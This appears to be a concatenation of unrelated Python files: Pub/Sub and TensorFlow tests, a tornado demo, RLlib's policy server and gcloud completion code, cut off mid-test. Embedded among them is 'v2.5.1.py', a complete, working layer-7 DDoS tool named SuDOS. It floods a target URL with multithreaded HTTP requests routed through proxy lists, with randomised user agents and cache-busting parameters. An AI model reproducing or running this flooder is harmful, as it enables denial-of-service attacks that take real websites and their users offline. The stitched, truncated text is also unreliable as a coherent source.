def test__should_terminate_false():
manager = make_manager()
exc = TypeError("wahhhhhh")
assert manager._should_terminate(exc) is False
@mock.patch("threading.Thread", autospec=True)
def test__on_rpc_done(thread):
manager = make_manager()
manager._on_rpc_done(mock.sentinel.error)
thread.assert_called_once_with(
name=mock.ANY, target=manager._shutdown, kwargs={"reason": mock.ANY}
)
_, kwargs = thread.call_args
reason = kwargs["kwargs"]["reason"]
assert isinstance(reason, Exception)
assert reason.args == (mock.sentinel.error,) # Exception wraps the original error
def test_activate_ordering_keys():
manager = make_manager()
manager._messages_on_hold = mock.create_autospec(
messages_on_hold.MessagesOnHold, instance=True
)
manager.activate_ordering_keys(["key1", "key2"])
manager._messages_on_hold.activate_ordering_keys.assert_called_once_with(
["key1", "key2"], mock.ANY
)
def test_activate_ordering_keys_stopped_scheduler():
manager = make_manager()
manager._messages_on_hold = mock.create_autospec(
messages_on_hold.MessagesOnHold, instance=True
)
manager._scheduler = None
manager.activate_ordering_keys(["key1", "key2"])
manager._messages_on_hold.activate_ordering_keys.assert_not_called()
|
ct.py | #!/usr/bin/env python
# coding=utf-8
import time
import threading
import tornado.ioloop
from tornado.concurrent import Future
ioloop = tornado.ioloop.IOLoop.current()
def long_task(future, sec=5):
print("long task start")
time.sleep(sec)
print("after sleep")
future.set_result("long task done in %s sec" % sec)
def after_task_done(future):
print("task done")
print(future.result())
def test_future():
future = Future()
threading.Thread(target=long_task, args=(future,)).start()
ioloop.add_future(future, after_task_done)
if __name__ == "__main__":
ioloop.add_callback(test_future)
ioloop.start()
|
v2.5.1.py | #!/usr/bin/env python
#version: 2.5.1 beta
import threading
import argparse
import random
import atexit
import socket
import socks
import time
import ssl
import sys
import os
start_time = 0
active_connections = 0
connection_limit = 0
active_threads = 0
max_threads = 100
delay = 1
ups = 0
total_ups = 0
dps = 0
total_dps = 0
hrs = 0
total_hrs = 0
total_connected = 0
RED = "\u001b[31;1m"
GREEN = "\u001b[32;1m"
YELLOW = "\u001b[33;1m"
BLUE = "\u001b[34;1m"
RESET = "\u001b[0;0m"
user_agents = [
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/33.0.1750.152 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/537.75.14",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:27.0) Gecko/20100101 Firefox/27.0",
"AppleWebKit/533.21.1 (KHTML, like Gecko) Version/5.0.5 Safari/533.21.1",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:5.0.1) ",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30",
"Opera/9.80 (Macintosh; Intel Mac OS X 10.7.0; U; Edition MacAppStore; en) ",
"Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/534.34 (KHTML,like Gecko) PhantomJS/1.9.0 (development) Safari/534.34",
"Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2)"
]
def sudos(url, **kwargs):
try:
global active_threads
global active_connections
global hrs
global total_hrs
global total_connected
global dps
global total_dps
global ups
global total_ups
active_threads += 1
connected = False
proxy_type = kwargs.get("proxy_type")
proxy_host = kwargs.get("proxy_host")
proxy_port = kwargs.get("proxy_port")
receive_http = kwargs.get("receive_http")
url_dict = url_split(url)
if not url_dict:
print(f"sudos error: invalid url")
return
protocol = url_dict["protocol"]
host = url_dict["domain"]
port = url_dict["port"]
path = url_dict["path"]
parameters = url_dict["parameters"]
if proxy_host:
if not proxy_type:
print(f"sudos error: missing proxy type")
return
elif not proxy_port:
print(f"sudos error: missing proxy port")
return
try:
proxy_port = int(proxy_port)
except ValueError:
print(f"sudos error: unable to convert proxy port to integer")
return
if proxy_host:
sock = socks.socksocket()
sock.set_proxy(proxy_type, proxy_host, proxy_port)
else:
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((host, port))
connected = True
active_connections += 1
total_connected += 1
if protocol == "https":
context = ssl.create_default_context()
sock = context.wrap_socket(sock, server_hostname=host)
if parameters:
parameters = f"&{parameters}"
else:
parameters = ""
while True:
if active_connections < connection_limit:
continue
anti_cache = rand_chars(77)
user_agent = random.choice(user_agents)
http = f"GET {path}?{anti_cache}{parameters} HTTP/1.1\r\nHost: {host}\r\nUser-Agent: {user_agent}\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\r\nAccept-Encoding: gzip, deflate\r\nAccept-Language: en-US,en;q=0.5\r\nCache-Control: max-age=0\r\nConnection: keep-alive\r\nDNT: 1\r\nUpgrade-Insecure-Requests: 1\r\n\r\n"
up = sock.send(http.encode())
ups += up
total_ups += up
hrs += 1
total_hrs += 1
if receive_http:
while True:
receive = sock.recv(1024)
download = len(receive)
dps += download
total_dps += download
if download < 1024:
break
time.sleep(delay)
except Exception as e:
#print(f"sudos error: {e}")
pass
finally:
active_threads -= 1
if connected:
active_connections -= 1
def clear_console():
if sys.platform == "linux":
os.system("clear")
elif sys.platform == "win32":
os.system("cls")
def rand_chars(length):
chars = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
chars_list = list(chars)
rand_text = random.choices(chars_list, k=length)
text = "".join(rand_text)
return text
def separate(separator_length, string):
separator = " " * separator_length
string = str(string)
return separator[len(string):]
def verbose():
try:
global hrs
global dps
global ups
while True:
print(f"Threads: {GREEN}{active_threads}{RESET} {separate(5, active_threads)} Connections: {GREEN}{active_connections}{RESET} {separate(5, active_connections)} HR/s: {GREEN}{hrs}{RESET} {separate(5, hrs)} D/s: {GREEN}{dps}{RESET} {separate(12, dps)} U/s {GREEN}{ups}{RESET}")
hrs = 0
dps = 0
ups = 0
time.sleep(1)
except Exception:
pass
def url_split(url):
try:
try:
protocol, url = url.split("://", 1)
except ValueError:
return
try:
domain, path = url.split("/", 1)
except ValueError:
domain = url
path = ""
try:
domain, port = domain.split(":", 1)
except ValueError:
if protocol == "https":
port = 443
else:
port = 80
port = int(port)
try:
path, parameters = path.split("?", 1)
except ValueError:
parameters = None
path = f"/{path}"
url_dict = {}
url_dict["protocol"] = protocol
url_dict["domain"] = domain
url_dict["port"] = port
url_dict["path"] = path
url_dict["parameters"] = parameters
return url_dict
except Exception:
return
def bytecount(bytesize):
total = f"{bytesize} B"
if bytesize >= 1000:
total = bytesize / 1000
total = f"{total:.2f} kB"
if bytesize >= 1000000:
total = bytesize / 1000000
total = f"{total:.2f} MB"
if bytesize >= 1000000000:
total = bytesize / 1000000000
total = f"{total:.2f} GB"
if bytesize >= 1000000000000:
total = bytesize / 1000000000000
total = f"{total:.2f} TB"
return total
def onexit():
attack_duration = time.time() - start_time
attack_duration = f"{attack_duration:.2f}"
total_download = bytecount(total_dps)
total_upload = bytecount(total_ups)
print(f"\r\nTotal Requests: {total_hrs}\r\nTotal Connected: {total_connected}\r\nTotal Download: {total_download}\r\nTotal Upload: {total_upload}\r\n\r\nAttack Duration: {attack_duration} seconds")
def main():
try:
global max_threads
global delay
global connection_limit
global start_time
parser = argparse.ArgumentParser(description="SuDOS, powerful layer 7 proxy-based DDoS tool.")
parser.add_argument("-t", "--threads", type=int, default=100, metavar="INT", help="Max thread count")
parser.add_argument("-z", "--proxy-type", choices=["http", "socks4", "socks5"], metavar="PROXYTYPE", help="Proxy list type")
parser.add_argument("-x", "--proxy-list", metavar="PROXYFILE", help="Proxy list file")
parser.add_argument("-c", "--timeout", type=int, default=5, metavar="TIMEOUT", help="Socket connection timeout")
parser.add_argument("-v", "--delay", type=int, default=1, metavar="DELAY", help="Timeout per HTTP request")
parser.add_argument("-b", "--connection-limit", type=int, metavar="INT", help="Connected socket count before flooding the target server")
parser.add_argument("-n", "--receive-http", action="store_true", help="Whether to receive HTTP response or not")
parser.add_argument("url", nargs="?", metavar="URL", help="Target URL including protocol, domain and port for particular use")
args = parser.parse_args()
max_threads = args.threads
proxy_type = args.proxy_type
proxy_list = args.proxy_list
timeout = args.timeout
receive_http = args.receive_http
url = args.url
if not url:
print(f"ERROR: URL is required")
parser.print_usage()
sys.exit()
socket.setdefaulttimeout(timeout)
delay = args.delay
if args.connection_limit:
connection_limit = args.connection_limit
if not url_split(url):
print(f"ERROR: Invalid URL")
sys.exit()
if proxy_list:
if not proxy_type:
print(f"ERROR: Proxy type is missing")
sys.exit()
try:
proxy_list = open(proxy_list, "r")
proxies = proxy_list.readlines()
proxy_list.close()
except FileNotFoundError:
print(f"ERROR: Proxy list file not found")
sys.exit()
except Exception:
print(f"ERROR: Invalid proxy list file")
sys.exit()
proxy_type = proxy_type.upper()
proxy_type = getattr(socks, proxy_type)
atexit.register(onexit)
threading.Thread(target=verbose, daemon=True).start()
start_time = time.time()
clear_console()
if proxy_list:
while True:
for proxy in proxies:
proxy = proxy.strip()
try:
proxy_host, proxy_port = proxy.split(":")
except Exception:
continue
try:
proxy_port = int(proxy_port)
except Exception:
continue
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], kwargs={"proxy_type": proxy_type, "proxy_host": proxy_host, "proxy_port": proxy_port, "receive_http": receive_http}, daemon=True).start()
break
else:
while True:
if active_threads >= max_threads:
continue
threading.Thread(target=sudos, args=[url], daemon=True).start()
except KeyboardInterrupt:
sys.exit()
except Exception as e:
print(f"main error: {e}")
pass
if __name__ == "__main__":
main()
|
policy_server_input.py | from http.server import HTTPServer, SimpleHTTPRequestHandler
import logging
import queue
from socketserver import ThreadingMixIn
import threading
import time
import traceback
from typing import List
import ray.cloudpickle as pickle
from ray.rllib.env.policy_client import (
_create_embedded_rollout_worker,
Commands,
)
from ray.rllib.offline.input_reader import InputReader
from ray.rllib.policy.sample_batch import SampleBatch
from ray.rllib.utils.annotations import override, PublicAPI
from ray.rllib.evaluation.metrics import RolloutMetrics
from ray.rllib.evaluation.sampler import SamplerInput
from ray.rllib.utils.typing import SampleBatchType
logger = logging.getLogger(__name__)
class PolicyServerInput(ThreadingMixIn, HTTPServer, InputReader):
"""REST policy server that acts as an offline data source.
This launches a multi-threaded server that listens on the specified host
and port to serve policy requests and forward experiences to RLlib. For
high performance experience collection, it implements InputReader.
For an example, run `examples/serving/cartpole_server.py` along
with `examples/serving/cartpole_client.py --inference-mode=local|remote`.
Examples:
>>> import gym
>>> from ray.rllib.algorithms.pg import PGTrainer
>>> from ray.rllib.env.policy_client import PolicyClient
>>> from ray.rllib.env.policy_server_input import PolicyServerInput
>>> addr, port = ... # doctest: +SKIP
>>> pg = PGTrainer( # doctest: +SKIP
... env="CartPole-v0", config={ # doctest: +SKIP
... "input": lambda io_ctx: # doctest: +SKIP
... PolicyServerInput(io_ctx, addr, port), # doctest: +SKIP
... # Run just 1 server, in the trainer.
... "num_workers": 0, # doctest: +SKIP
... } # doctest: +SKIP
>>> while True: # doctest: +SKIP
>>> pg.train() # doctest: +SKIP
>>> client = PolicyClient( # doctest: +SKIP
... "localhost:9900", inference_mode="local")
>>> eps_id = client.start_episode() # doctest: +SKIP
>>> env = gym.make("CartPole-v0")
>>> obs = env.reset()
>>> action = client.get_action(eps_id, obs) # doctest: +SKIP
>>> reward = env.step(action)[0] # doctest: +SKIP
>>> client.log_returns(eps_id, reward) # doctest: +SKIP
>>> client.log_returns(eps_id, reward) # doctest: +SKIP
"""
@PublicAPI
def __init__(self, ioctx, address, port, idle_timeout=3.0):
"""Create a PolicyServerInput.
This class implements rllib.offline.InputReader, and can be used with
any Trainer by configuring
{"num_workers": 0,
"input": lambda ioctx: PolicyServerInput(ioctx, addr, port)}
Note that by setting num_workers: 0, the trainer will only create one
rollout worker / PolicyServerInput. Clients can connect to the launched
server using rllib.env.PolicyClient.
Args:
ioctx (IOContext): IOContext provided by RLlib.
address (str): Server addr (e.g., "localhost").
port (int): Server port (e.g., 9900).
"""
self.rollout_worker = ioctx.worker
self.samples_queue = queue.Queue()
self.metrics_queue = queue.Queue()
self.idle_timeout = idle_timeout
# Forwards client-reported metrics directly into the local rollout
# worker.
if self.rollout_worker.sampler is not None:
# This is a bit of a hack since it is patching the get_metrics
# function of the sampler.
def get_metrics():
completed = []
while True:
try:
completed.append(self.metrics_queue.get_nowait())
except queue.Empty:
break
return completed
self.rollout_worker.sampler.get_metrics = get_metrics
else:
# If there is no sampler, act like if there would be one to collect
# metrics from
class MetricsDummySampler(SamplerInput):
"""This sampler only maintains a queue to get metrics from."""
def __init__(self, metrics_queue):
"""Initializes an AsyncSampler instance.
Args:
metrics_queue: A queue of metrics
"""
self.metrics_queue = metrics_queue
def get_data(self) -> SampleBatchType:
raise NotImplementedError
def get_extra_batches(self) -> List[SampleBatchType]:
raise NotImplementedError
def get_metrics(self) -> List[RolloutMetrics]:
"""Returns metrics computed on a policy client rollout worker."""
completed = []
while True:
try:
completed.append(self.metrics_queue.get_nowait())
except queue.Empty:
break
return completed
self.rollout_worker.sampler = MetricsDummySampler(self.metrics_queue)
# Create a request handler that receives commands from the clients
# and sends data and metrics into the queues.
handler = _make_handler(
self.rollout_worker, self.samples_queue, self.metrics_queue
)
try:
import time
time.sleep(1)
HTTPServer.__init__(self, (address, port), handler)
except OSError:
print(f"Creating a PolicyServer on {address}:{port} failed!")
import time
time.sleep(1)
raise
logger.info(
"Starting connector server at " f"{self.server_name}:{self.server_port}"
)
# Start the serving thread, listening on socket and handling commands.
serving_thread = threading.Thread(name="server", target=self.serve_forever)
serving_thread.daemon = True
serving_thread.start()
# Start a dummy thread that puts empty SampleBatches on the queue, just
# in case we don't receive anything from clients (or there aren't
# any). The latter would block sample collection entirely otherwise,
# even if other workers' PolicyServerInput receive incoming data from
# actual clients.
heart_beat_thread = threading.Thread(
name="heart-beat", target=self._put_empty_sample_batch_every_n_sec
)
heart_beat_thread.daemon = True
heart_beat_thread.start()
@override(InputReader)
def next(self):
return self.samples_queue.get()
def _put_empty_sample_batch_every_n_sec(self):
# Places an empty SampleBatch every `idle_timeout` seconds onto the
# `samples_queue`. This avoids hanging of all RolloutWorkers parallel
# to this one in case this PolicyServerInput does not have incoming
# data (e.g. no client connected).
while True:
time.sleep(self.idle_timeout)
self.samples_queue.put(SampleBatch())
def _make_handler(rollout_worker, samples_queue, metrics_queue):
# Only used in remote inference mode. We must create a new rollout worker
# then since the original worker doesn't have the env properly wrapped in
# an ExternalEnv interface.
child_rollout_worker = None
inference_thread = None
lock = threading.Lock()
def setup_child_rollout_worker():
nonlocal lock
with lock:
nonlocal child_rollout_worker
nonlocal inference_thread
if child_rollout_worker is None:
(
child_rollout_worker,
inference_thread,
) = _create_embedded_rollout_worker(
rollout_worker.creation_args(), report_data
)
child_rollout_worker.set_weights(rollout_worker.get_weights())
def report_data(data):
nonlocal child_rollout_worker
batch = data["samples"]
batch.decompress_if_needed()
samples_queue.put(batch)
for rollout_metric in data["metrics"]:
metrics_queue.put(rollout_metric)
if child_rollout_worker is not None:
child_rollout_worker.set_weights(
rollout_worker.get_weights(), rollout_worker.get_global_vars()
)
class Handler(SimpleHTTPRequestHandler):
def __init__(self, *a, **kw):
super().__init__(*a, **kw)
def do_POST(self):
content_len = int(self.headers.get("Content-Length"), 0)
raw_body = self.rfile.read(content_len)
parsed_input = pickle.loads(raw_body)
try:
response = self.execute_command(parsed_input)
self.send_response(200)
self.end_headers()
self.wfile.write(pickle.dumps(response))
except Exception:
self.send_error(500, traceback.format_exc())
def execute_command(self, args):
command = args["command"]
response = {}
# Local inference commands:
if command == Commands.GET_WORKER_ARGS:
logger.info("Sending worker creation args to client.")
response["worker_args"] = rollout_worker.creation_args()
elif command == Commands.GET_WEIGHTS:
logger.info("Sending worker weights to client.")
response["weights"] = rollout_worker.get_weights()
response["global_vars"] = rollout_worker.get_global_vars()
elif command == Commands.REPORT_SAMPLES:
logger.info(
"Got sample batch of size {} from client.".format(
args["samples"].count
)
)
report_data(args)
# Remote inference commands:
elif command == Commands.START_EPISODE:
setup_child_rollout_worker()
assert inference_thread.is_alive()
response["episode_id"] = child_rollout_worker.env.start_episode(
args["episode_id"], args["training_enabled"]
)
elif command == Commands.GET_ACTION:
assert inference_thread.is_alive()
response["action"] = child_rollout_worker.env.get_action(
args["episode_id"], args["observation"]
)
elif command == Commands.LOG_ACTION:
assert inference_thread.is_alive()
child_rollout_worker.env.log_action(
args["episode_id"], args["observation"], args["action"]
)
elif command == Commands.LOG_RETURNS:
assert inference_thread.is_alive()
if args["done"]:
child_rollout_worker.env.log_returns(
args["episode_id"], args["reward"], args["info"], args["done"]
)
else:
child_rollout_worker.env.log_returns(
args["episode_id"], args["reward"], args["info"]
)
elif command == Commands.END_EPISODE:
assert inference_thread.is_alive()
child_rollout_worker.env.end_episode(
args["episode_id"], args["observation"]
)
else:
raise ValueError("Unknown command: {}".format(command))
return response
return Handler
|
remote_completion.py | # Copyright 2014 Google Inc. All Rights Reserved.
"""Remote resource completion and caching."""
import logging
import os
import threading
import time
import argcomplete
from googlecloudsdk.core import config
from googlecloudsdk.core import properties
class CompletionProgressTracker(object):
"""A context manager for telling the user about long-running completions."""
SPIN_MARKS = [
'|',
'/',
'-',
'\\',
]
def __init__(self, ofile, timeout=3.0, autotick=True):
self._ticks = 0
self._autotick = autotick
self._done = False
self._lock = threading.Lock()
self.ofile = ofile
self.timeout = timeout
def __enter__(self):
if self._autotick:
def Ticker():
time.sleep(.2)
self.timeout -= .2
while True:
if self.timeout < 0:
self.ofile.write('?\b')
self.ofile.flush()
os.kill(0, 15)
time.sleep(.1)
self.timeout -= .1
if self.Tick():
return
threading.Thread(target=Ticker).start()
return self
def Tick(self):
"""Give a visual indication to the user that some progress has been made."""
with self._lock:
if not self._done:
self._ticks += 1
self.ofile.write(
CompletionProgressTracker.SPIN_MARKS[
self._ticks % len(CompletionProgressTracker.SPIN_MARKS)] + '\b')
self.ofile.flush()
return self._done
def __exit__(self, unused_type=None, unused_value=True,
unused_traceback=None):
with self._lock:
self.ofile.write(' \b')
self._done = True
class RemoteCompletion(object):
"""Class to cache the names of remote resources."""
CACHE_HITS = 0
CACHE_TRIES = 0
_TIMEOUTS = { # Timeouts for resources in seconds
'sql.instances': 600,
'compute.instances': 600,
'compute.regions': 3600*10,
'compute.zones': 3600*10
}
ITEM_NAME_FUN = {
'compute': lambda item: item['name'],
'sql': lambda item: item.instance
}
def __init__(self):
"""Set the cache directory."""
try:
self.project = properties.VALUES.core.project.Get(required=True)
except Exception: # pylint:disable=broad-except
self.project = 0
self.cache_dir = config.Paths().completion_cache_dir
def ResourceIsCached(self, resource):
"""Returns True for resources that can be cached.
Args:
resource: The resource as subcommand.resource.
Returns:
True when resource is cacheable.
"""
if resource == 'sql.instances':
return True
if resource.startswith('compute.'):
return True
return False
def CachePath(self, resource, zoneregion):
"""Creates a pathname for the resource.
Args:
resource: The resource as subcommand.resource.
zoneregion: The zone or region name.
Returns:
Returns a pathname for the resource.
"""
if self.project:
path = os.path.join(self.cache_dir, resource, self.project)
else:
return 0
if zoneregion:
path = os.path.join(path, zoneregion)
return path
def GetFromCache(self, resource, zoneregion=None):
"""Return a list of names for the resource and zoneregion.
Args:
resource: The resource as subcommand.resource.
zoneregion: The zone or region name or None.
Returns:
Returns a list of names if in the cache.
"""
options = []
RemoteCompletion.CACHE_TRIES += 1
fpath = self.CachePath(resource, zoneregion)
if not fpath:
return None
try:
if os.path.getmtime(fpath) > time.time():
with open(fpath, 'r') as f:
line = f.read().rstrip('\n')
options = line.split(' ')
RemoteCompletion.CACHE_HITS += 1
return options
except Exception: # pylint:disable=broad-except
return None
return None
def StoreInCache(self, resource, options, zoneregion):
"""Return the list of names for the resource and zoneregion.
Args:
resource: The resource as subcommand.resource.
options: A list of possible completions.
zoneregion: The zone or region name, or None if no zone or region.
Returns:
None
"""
path = self.CachePath(resource, zoneregion)
if not path:
return
if not zoneregion and os.path.isdir(path):
name = os.path.join(path, '_ALL_ZONES')
try:
os.remove(name)
except OSError:
pass
os.rmdir(path)
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
if options:
with open(path, 'w') as f:
f.write(' '.join(options) + '\n')
now = time.time()
if options is None:
timeout = 0
else:
timeout = RemoteCompletion._TIMEOUTS.get(resource, 300)
os.utime(path, (now, now+timeout))
@staticmethod
def GetTickerStream():
return argcomplete.debug_stream
@staticmethod
def GetCompleterForResource(resource, cli):
"""Returns a completer function for the give resource.
Args:
resource: The resource as subcommand.resource.
cli: The calliope instance.
Returns:
A completer function for the specified resource.
"""
def RemoteCompleter(parsed_args, **unused_kwargs):
"""Run list command on resource to generates completion options."""
options = []
try:
command = resource.split('.') + ['list']
zoneregion = None
if command[0] == 'compute':
zoneregion = ''
if hasattr(parsed_args, 'zone') and parsed_args.zone:
zoneregion = parsed_args.zone
command.append('--zone')
command.append(zoneregion)
if hasattr(parsed_args, 'region') and parsed_args.region:
zoneregion = parsed_args.region
command.append('--region')
command.append(zoneregion)
ccache = RemoteCompletion()
if not ccache.project and hasattr(parsed_args, 'project'):
ccache.project = parsed_args.project
options = ccache.GetFromCache(resource, zoneregion)
if options is None:
properties.VALUES.core.user_output_enabled.Set(False)
ofile = RemoteCompletion.GetTickerStream()
with CompletionProgressTracker(ofile):
items = list(cli().Execute(command, call_arg_complete=False))
fun = RemoteCompletion.ITEM_NAME_FUN[command[0]]
options = []
allzones = False
for item in items:
if zoneregion == '': # pylint:disable=g-explicit-bool-comparison
if 'zone' in item or 'region' in item:
zoneregion = '_ALL_ZONES'
allzones = True
zones = {}
else:
zoneregion = None
options.append(fun(item))
if allzones:
if 'zone' in item:
zone = item['zone']
else:
zone = item['region']
if zone and zone in zones:
zones[zone].append(fun(item))
elif zone:
zones[zone] = [fun(item)]
if allzones:
for zone in zones:
ccache.StoreInCache(resource, zones[zone], zone)
ccache.StoreInCache(resource, options, zoneregion)
except Exception: # pylint:disable=broad-except
logging.error(resource + 'completion command failed', exc_info=True)
return []
return options
return RemoteCompleter
|
map_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for `tf.data.Dataset.map()`."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import threading
import time
import warnings
from absl.testing import parameterized
import numpy as np
from tensorflow.core.framework import attr_value_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_sanitizers
from tensorflow.python.data.kernel_tests import checkpoint_test_base
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import options as options_lib
from tensorflow.python.eager import context
from tensorflow.python.framework import combinations
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import function
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.framework import tensor_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import map_fn
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import tensor_array_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.ops import variables
from tensorflow.python.ops.ragged import ragged_concat_ops
from tensorflow.python.ops.ragged import ragged_factory_ops
from tensorflow.python.ops.ragged import ragged_tensor
from tensorflow.python.platform import test
from tensorflow.python.training import checkpoint_management
from tensorflow.python.training.tracking import util as trackable_utils
try:
import attr # pylint:disable=g-import-not-at-top
except ImportError:
attr = None
def _test_combinations_with_mode_v1(mode):
def new_map_fn(dataset, *args, **kwargs):
return dataset.map(*args, **kwargs)
def legacy_map_fn(dataset, *args, **kwargs):
return dataset.map_with_legacy_function(*args, **kwargs)
new_map_combinations = combinations.combine(
tf_api_version=1,
mode=mode,
apply_map=combinations.NamedObject("map_fn", new_map_fn))
legacy_map_combinations = combinations.combine(
tf_api_version=1,
mode=mode,
apply_map=combinations.NamedObject("legacy_map_fn", legacy_map_fn))
return new_map_combinations + legacy_map_combinations
def _test_combinations_with_mode_v2(mode):
def new_map_fn(dataset, *args, **kwargs):
return dataset.map(*args, **kwargs)
return combinations.combine(
tf_api_version=2,
mode=mode,
apply_map=combinations.NamedObject("map_fn", new_map_fn))
def _test_combinations_with_mode(mode):
return _test_combinations_with_mode_v1(
mode) + _test_combinations_with_mode_v2(mode)
def _test_combinations():
return _test_combinations_with_mode("eager") + _test_combinations_with_mode(
"graph")
def _short_circuit_test_cases():
cases = [
("Identity", None, lambda x: x),
("Replicate", None, lambda x: (x, x)),
("Swap", (None, None), lambda x, y: (y, x)),
("Project", (None, None), lambda x, y: x)
]
def reduce_fn(x, y):
name, structure, fn = y
return x + combinations.combine(
structure=structure, fn=combinations.NamedObject(name, fn))
return functools.reduce(reduce_fn, cases, [])
class Foo(object):
"""Dummy class used for invalid return value tests."""
def __init__(self):
pass
class MapTest(test_base.DatasetTestBase, parameterized.TestCase):
def _map_dataset_factory(self, components, apply_map, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(dataset, _map_fn).repeat(count)
self.assertEqual(
[c.shape[1:] for c in components],
[shape for shape in dataset_ops.get_legacy_output_shapes(dataset)])
return dataset
@combinations.generate(_test_combinations())
def testMapDataset(self, apply_map):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._map_dataset_factory(components, apply_map, count=14))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(_test_combinations_with_mode("graph"))
def testMapDatasetMultiThreaded(self, apply_map):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._map_dataset_factory(components, apply_map, count=18))
results = []
with self.cached_session() as sess:
def iterator_thread():
while True:
try:
results.append(sess.run(get_next()))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _parallel_map_dataset_factory(self, components, apply_map, count,
num_parallel_calls, buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
dataset = dataset_ops.Dataset.from_tensor_slices(components)
dataset = apply_map(dataset, _map_fn, num_parallel_calls=num_parallel_calls)
dataset = dataset.prefetch(buffer_size).repeat(count)
self.assertEqual(
[c.shape[1:] for c in components],
[shape for shape in dataset_ops.get_legacy_output_shapes(dataset)])
return dataset
@combinations.generate(
combinations.times(
_test_combinations(),
combinations.combine(num_parallel_calls=1, buffer_size=1) +
combinations.combine(num_parallel_calls=1, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=4) +
combinations.combine(num_parallel_calls=8, buffer_size=8) +
combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDataset(self, apply_map, num_parallel_calls, buffer_size):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
# Test single-threaded access to the iterator.
get_next = self.getNext(
self._parallel_map_dataset_factory(components, apply_map, 14,
num_parallel_calls, buffer_size))
for _ in range(14):
for i in range(7):
result = self.evaluate(get_next())
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
self.evaluate(get_next())
# TODO(b/117581999): add eager coverage
@combinations.generate(
combinations.times(
_test_combinations_with_mode("graph"),
combinations.combine(num_parallel_calls=1, buffer_size=1) +
combinations.combine(num_parallel_calls=1, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=2) +
combinations.combine(num_parallel_calls=2, buffer_size=4) +
combinations.combine(num_parallel_calls=8, buffer_size=8) +
combinations.combine(num_parallel_calls=8, buffer_size=16)))
def testParallelMapDatasetMultiThreaded(self, apply_map, num_parallel_calls,
buffer_size):
# Test multi-threaded access to the same iterator.
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
get_next = self.getNext(
self._parallel_map_dataset_factory(components, apply_map, 18,
